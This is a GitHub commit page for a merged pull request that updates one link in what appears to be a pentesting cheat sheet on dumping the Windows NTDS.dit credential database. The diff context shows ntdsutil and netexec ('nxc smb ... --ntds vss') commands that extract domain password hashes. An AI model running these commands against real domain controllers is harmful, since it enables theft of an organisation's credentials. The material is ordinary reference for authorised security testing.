Merge pull request #8 from mpgn/main

replace old link
pull/9/head
Swissky 2024-03-29 23:30:50 +01:00 committed by GitHub
commit ca201ac579
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -48,7 +48,7 @@ The VSS is a Windows service that allows users to create snapshots or backups of
```powershell ```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
``` ```
* [netexec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) * [netexec VSS module](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit)
```powershell ```powershell
nxc smb 10.10.0.202 -u username -p password --ntds vss nxc smb 10.10.0.202 -u username -p password --ntds vss
``` ```